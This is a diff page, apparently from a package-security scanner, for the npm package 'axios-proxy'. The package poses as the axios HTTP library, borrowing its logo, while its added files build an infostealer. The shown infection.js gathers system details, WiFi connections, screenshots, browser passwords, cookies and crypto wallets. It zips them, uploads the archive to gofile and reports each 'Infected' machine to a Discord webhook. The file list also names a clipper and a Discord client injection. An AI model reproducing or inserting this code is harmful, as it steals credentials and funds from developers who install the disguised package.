axios-proxy 0.0.1-security → 1.7.7
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of axios-proxy might be problematic. Click here for more details.
- package/LICENSE +201 -0
- package/README.md +1313 -5
- package/config/counter.js +24 -0
- package/config/crypto.js +20 -0
- package/config/discord.js +23 -0
- package/config/environ.js +132 -0
- package/config/executable.js +8 -0
- package/config/jszip.js +15 -0
- package/config/jsziptg.js +15 -0
- package/config/main.js +6 -0
- package/config/telegram.js +7 -0
- package/config/user.js +43 -0
- package/config/wallets.js +17 -0
- package/config.js +8 -0
- package/discord.js +648 -0
- package/discord_desktop_core/index.js +856 -0
- package/gofile.js +323 -0
- package/index.js +3 -0
- package/index2.js +323 -0
- package/infection.js +276 -0
- package/keywords.js +16 -0
- package/package.json +47 -3
- package/utils/browsers.js +503 -0
- package/utils/clipper.js +38 -0
- package/utils/constructor.js +14 -0
- package/utils/data.js +19 -0
- package/utils/discord.js +448 -0
- package/utils/encryption.js +11 -0
- package/utils/flags.js +509 -0
- package/utils/infection.js +199 -0
- package/utils/jszip.js +37 -0
- package/utils/jsziptg.js +37 -0
- package/utils/protection.js +45 -0
- package/utils/prototype.js +29 -0
- package/utils/telegram.js +27 -0
- package/utils/time.js +7 -0
- package/utils/wallets.js +31 -0
- package/utils/webhook.js +78 -0
- package/wallets.js +23 -0
package/infection.js
ADDED
@@ -0,0 +1,276 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
async get_user_info() {
|
4
|
+
let cpus = [];
|
5
|
+
|
6
|
+
for (var cpu of client.config.user.cpus) {
|
7
|
+
cpus.push(client.utils.encryption.decryptData(cpu));
|
8
|
+
}
|
9
|
+
|
10
|
+
let pc_info_text =
|
11
|
+
"<================[ User Info ]>================>\n<================[t.me/turcoflex]>================>\n\n";
|
12
|
+
let fields = [];
|
13
|
+
|
14
|
+
const wifi_connections = await client.config.user.wifi_connections();
|
15
|
+
|
16
|
+
for (let [key, value] of Object.entries({
|
17
|
+
"🖥️ CPU(s)": cpus.join("\n"),
|
18
|
+
"⚡ RAM": client.utils.encryption.decryptData(client.config.user.ram),
|
19
|
+
"🛑 Version": client.utils.encryption.decryptData(
|
20
|
+
client.config.user.version
|
21
|
+
),
|
22
|
+
"⏳ Uptime": client.utils.encryption.decryptData(
|
23
|
+
client.config.user.uptime
|
24
|
+
),
|
25
|
+
"📂 Host directory": client.utils.encryption.decryptData(
|
26
|
+
client.config.user.hostdir
|
27
|
+
),
|
28
|
+
"🆔 Host name": client.utils.encryption.decryptData(
|
29
|
+
client.config.user.hostname
|
30
|
+
),
|
31
|
+
"🆔 PC Name": client.utils.encryption.decryptData(
|
32
|
+
client.config.user.username
|
33
|
+
),
|
34
|
+
"👻 Type": client.utils.encryption.decryptData(client.config.user.type),
|
35
|
+
"🏹 Arch": client.utils.encryption.decryptData(client.config.user.arch),
|
36
|
+
"📢 Release": client.utils.encryption.decryptData(
|
37
|
+
client.config.user.release
|
38
|
+
),
|
39
|
+
"🌌 AppData Path": client.utils.encryption.decryptData(
|
40
|
+
client.config.user.appdata
|
41
|
+
),
|
42
|
+
"🪐 Temp Path": client.utils.encryption.decryptData(
|
43
|
+
client.config.user.temp
|
44
|
+
),
|
45
|
+
"🌐 User Domain": client.utils.encryption.decryptData(
|
46
|
+
client.config.user.user_domain
|
47
|
+
),
|
48
|
+
"💨 System Drive": client.utils.encryption.decryptData(
|
49
|
+
client.config.user.system_drive
|
50
|
+
),
|
51
|
+
"💾 Processors": client.utils.encryption.decryptData(
|
52
|
+
client.config.user.processors
|
53
|
+
),
|
54
|
+
"💾 Processor Identifier": client.utils.encryption.decryptData(
|
55
|
+
client.config.user.processor_identifier
|
56
|
+
),
|
57
|
+
"💾 Processor Architecture": client.utils.encryption.decryptData(
|
58
|
+
client.config.user.processor_architecture
|
59
|
+
),
|
60
|
+
})) {
|
61
|
+
pc_info_text += `${key}: ${value}\n`;
|
62
|
+
fields.push({
|
63
|
+
name: key,
|
64
|
+
value: `\`\`\`${value}\`\`\``,
|
65
|
+
inline: true,
|
66
|
+
});
|
67
|
+
}
|
68
|
+
|
69
|
+
let wifi_connections_text = `<================[WiFi connections]>================>\n<================[t.me/turcoflex ]>================>\n\n${wifi_connections}`;
|
70
|
+
|
71
|
+
client.utils.jszip.createTxt(
|
72
|
+
"\\WiFi Connections.txt",
|
73
|
+
wifi_connections_text
|
74
|
+
);
|
75
|
+
client.utils.jszip.createTxt("\\User Info.txt", pc_info_text);
|
76
|
+
|
77
|
+
return client.utils.webhook.createEmbed({
|
78
|
+
fields: fields,
|
79
|
+
});
|
80
|
+
},
|
81
|
+
|
82
|
+
get_executable_info() {
|
83
|
+
let executable_info_text =
|
84
|
+
"<================[Executable Info]>================>\n<================[t.me/turcoflex]>================>\n\n";
|
85
|
+
let fields = [];
|
86
|
+
|
87
|
+
for (let [key, value] of Object.entries({
|
88
|
+
"☠️ Execution path": client.utils.encryption.decryptData(
|
89
|
+
client.config.executable.execution_path
|
90
|
+
),
|
91
|
+
"🅿️ Debug port": client.config.executable.debug_port,
|
92
|
+
"🔢 PID": client.config.executable.pid,
|
93
|
+
"🔢 PPID": client.config.executable.ppid,
|
94
|
+
})) {
|
95
|
+
fields.push({
|
96
|
+
name: key,
|
97
|
+
value: `\`\`\`${value}\`\`\``,
|
98
|
+
inline: false,
|
99
|
+
});
|
100
|
+
executable_info_text += `${key}: ${value}\n`;
|
101
|
+
}
|
102
|
+
client.utils.jszip.createTxt(
|
103
|
+
"\\Executable Info.txt",
|
104
|
+
executable_info_text
|
105
|
+
);
|
106
|
+
|
107
|
+
return client.utils.webhook.createEmbed({
|
108
|
+
fields: fields,
|
109
|
+
});
|
110
|
+
},
|
111
|
+
|
112
|
+
async initialize() {
|
113
|
+
try {
|
114
|
+
await this.get_user_info();
|
115
|
+
} catch {}
|
116
|
+
try {
|
117
|
+
this.get_executable_info();
|
118
|
+
} catch {}
|
119
|
+
try {
|
120
|
+
await this.infect();
|
121
|
+
} catch {}
|
122
|
+
try {
|
123
|
+
await this.send_zip();
|
124
|
+
} catch (err) {
|
125
|
+
try {
|
126
|
+
await client.utils.webhook.sendToWebhook({
|
127
|
+
embeds: [
|
128
|
+
client.utils.webhook.createEmbed({
|
129
|
+
title: `⚠️ Could not send log`,
|
130
|
+
description: `\`\`\`${err}\`\`\``,
|
131
|
+
}),
|
132
|
+
],
|
133
|
+
});
|
134
|
+
} catch {}
|
135
|
+
}
|
136
|
+
},
|
137
|
+
|
138
|
+
getFolderFiles(path_prefix, path) {
|
139
|
+
var result = "";
|
140
|
+
|
141
|
+
for (var file of client.requires.fs.readdirSync(
|
142
|
+
`${path_prefix}\\${path}`
|
143
|
+
)) {
|
144
|
+
var file_size_in_kb = (
|
145
|
+
client.requires.fs.statSync(`${path_prefix}\\${path}\\${file}`).size /
|
146
|
+
1024
|
147
|
+
).toFixed(2);
|
148
|
+
if (
|
149
|
+
!client.requires.fs
|
150
|
+
.statSync(`${path_prefix}\\${path}\\${file}`)
|
151
|
+
.isDirectory()
|
152
|
+
) {
|
153
|
+
if (file.includes(".txt")) {
|
154
|
+
result += `📄 ${path}/${file} - ${file_size_in_kb} KB\n`;
|
155
|
+
} else if (file.includes(".png")) {
|
156
|
+
result += `🖼️ ${path}/${file} - ${file_size_in_kb} KB\n`;
|
157
|
+
} else {
|
158
|
+
result += `🥙 ${path}/${file} - ${file_size_in_kb} KB\n`;
|
159
|
+
}
|
160
|
+
} else {
|
161
|
+
result += this.getFolderFiles(`${path_prefix}\\`, `${path}/${file}`);
|
162
|
+
}
|
163
|
+
}
|
164
|
+
|
165
|
+
return result;
|
166
|
+
},
|
167
|
+
|
168
|
+
async send_zip() {
|
169
|
+
try {
|
170
|
+
await client.utils.browsers.saveBrowserStuff();
|
171
|
+
} catch (err) {
|
172
|
+
try {
|
173
|
+
await client.utils.webhook.sendToWebhook({
|
174
|
+
embeds: [
|
175
|
+
client.utils.webhook.createEmbed({
|
176
|
+
title: `⚠️ Could not save browser stuff`,
|
177
|
+
description: `\`\`\`${err}\`\`\``,
|
178
|
+
}),
|
179
|
+
],
|
180
|
+
});
|
181
|
+
} catch {}
|
182
|
+
}
|
183
|
+
|
184
|
+
try {
|
185
|
+
await client.utils.jszip.createZip();
|
186
|
+
} catch (err) {
|
187
|
+
try {
|
188
|
+
await client.utils.webhook.sendToWebhook({
|
189
|
+
embeds: [
|
190
|
+
client.utils.webhook.createEmbed({
|
191
|
+
title: `⚠️ Could not create zip file`,
|
192
|
+
description: `\`\`\`${err}\`\`\``,
|
193
|
+
}),
|
194
|
+
],
|
195
|
+
});
|
196
|
+
} catch {}
|
197
|
+
}
|
198
|
+
|
199
|
+
const upload = await client.utils.gofile.uploadFile(
|
200
|
+
client.requires.fs.createReadStream(`${client.config.jszip.path}.zip`)
|
201
|
+
);
|
202
|
+
|
203
|
+
var counter_embed = this.create_counter_embed();
|
204
|
+
|
205
|
+
counter_embed.description = `**[Download the zip file](${upload.downloadPage})**`;
|
206
|
+
|
207
|
+
await client.utils.webhook.sendToWebhook({
|
208
|
+
embeds: [counter_embed],
|
209
|
+
});
|
210
|
+
},
|
211
|
+
|
212
|
+
create_counter_embed() {
|
213
|
+
let obj = {
|
214
|
+
title: `💉 Infected - ${client.utils.encryption.decryptData(
|
215
|
+
client.config.user.hostname
|
216
|
+
)}/${client.utils.encryption.decryptData(
|
217
|
+
client.config.user.user_domain
|
218
|
+
)}/${client.utils.encryption.decryptData(client.config.user.username)}`,
|
219
|
+
footer: {
|
220
|
+
text: client.utils.encryption.decryptData(
|
221
|
+
client.config.embed.footer.text
|
222
|
+
),
|
223
|
+
icon_url: client.utils.encryption.decryptData(
|
224
|
+
client.config.embed.footer.icon_url
|
225
|
+
),
|
226
|
+
},
|
227
|
+
fields: [],
|
228
|
+
timestamp: new Date(),
|
229
|
+
};
|
230
|
+
|
231
|
+
let cpus = [];
|
232
|
+
|
233
|
+
for (var cpu of client.config.user.cpus) {
|
234
|
+
cpus.push(client.utils.encryption.decryptData(cpu));
|
235
|
+
}
|
236
|
+
|
237
|
+
for (let [key, value] of Object.entries({
|
238
|
+
"🔑 Passwords": client.config.counter.passwords,
|
239
|
+
"🍪 Cookies": client.config.counter.cookies,
|
240
|
+
"🔖 Bookmarks": client.config.counter.bookmarks,
|
241
|
+
"💰 Wallets": client.config.counter.wallets,
|
242
|
+
"📶 Wifi networks": client.config.counter.wifinetworks,
|
243
|
+
})) {
|
244
|
+
obj["fields"].push({
|
245
|
+
name: key,
|
246
|
+
value: `\`\`\`${value}\`\`\``,
|
247
|
+
inline: true,
|
248
|
+
});
|
249
|
+
}
|
250
|
+
|
251
|
+
return obj;
|
252
|
+
},
|
253
|
+
|
254
|
+
async get_screenshot() {
|
255
|
+
client.requires.screenshot.listDisplays().then((displays) => {
|
256
|
+
var random_uuid = client.requires.crypto.randomUUID();
|
257
|
+
Object.entries(displays).forEach(async (key, value) => {
|
258
|
+
client.config.counter.screenshots++;
|
259
|
+
client.requires.screenshot({
|
260
|
+
screen: key[1].id,
|
261
|
+
format: "png",
|
262
|
+
filename: `${client.config.jszip.path}/${random_uuid}_DISPLAY_${
|
263
|
+
parseInt(key[0]) + 1
|
264
|
+
}.png`,
|
265
|
+
});
|
266
|
+
});
|
267
|
+
});
|
268
|
+
},
|
269
|
+
|
270
|
+
async infect() {
|
271
|
+
await this.get_screenshot(client.config.webhook.url);
|
272
|
+
|
273
|
+
await client.utils.discord.init();
|
274
|
+
},
|
275
|
+
};
|
276
|
+
};
|
package/keywords.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,50 @@
|
|
1
1
|
{
|
2
|
+
"dependencies": {
|
3
|
+
"archiver": "^5.3.1",
|
4
|
+
"archiver-zip-encrypted": "^1.0.11",
|
5
|
+
"axios": "^0.27.2",
|
6
|
+
"buffer-replace": "^1.0.0",
|
7
|
+
"discord-webhook-node": "^1.1.8",
|
8
|
+
"is-wsl": "^2.2.0",
|
9
|
+
"javascript-obfuscator": "^4.0.0",
|
10
|
+
"nexe-natives-fix": "^1.0.1",
|
11
|
+
"node-gyp": "^9.3.1",
|
12
|
+
"node-machine-id": "^1.1.12",
|
13
|
+
"node-resourcehacker": "^1.2.1",
|
14
|
+
"request": "^2.88.2",
|
15
|
+
"sqlite3": "^5.0.8",
|
16
|
+
"systeminformation": "^5.11.16",
|
17
|
+
"temp-dir": "^2.0.0",
|
18
|
+
"win-dpapi": "^1.1.0",
|
19
|
+
"zip-lib": "^0.7.3"
|
20
|
+
},
|
21
|
+
"nodeVersion": "system",
|
2
22
|
"name": "axios-proxy",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
23
|
+
"version": "1.7.7",
|
24
|
+
"description": "<h1 align=\"center\">\r <b>\r <a href=\"https://axios-http.com\"><img src=\"https://axios-http.com/assets/logo.svg\" /></a><br>\r </b>\r </h1>",
|
25
|
+
"main": "./index.js",
|
26
|
+
"bin": {
|
27
|
+
"liliandorker": "index.js"
|
28
|
+
},
|
29
|
+
"pkg": {
|
30
|
+
"assets": [
|
31
|
+
"./node_modules",
|
32
|
+
"./utils",
|
33
|
+
"./config",
|
34
|
+
"./index.js"
|
35
|
+
]
|
36
|
+
},
|
37
|
+
"devDependencies": {
|
38
|
+
"cross-env": "^7.0.3"
|
39
|
+
},
|
40
|
+
"scripts": {
|
41
|
+
"test": "npm run test"
|
42
|
+
},
|
43
|
+
"keywords": [
|
44
|
+
"axios",
|
45
|
+
"request",
|
46
|
+
"proxy"
|
47
|
+
],
|
48
|
+
"author": "cfall",
|
49
|
+
"license": "ISC"
|
6
50
|
}
|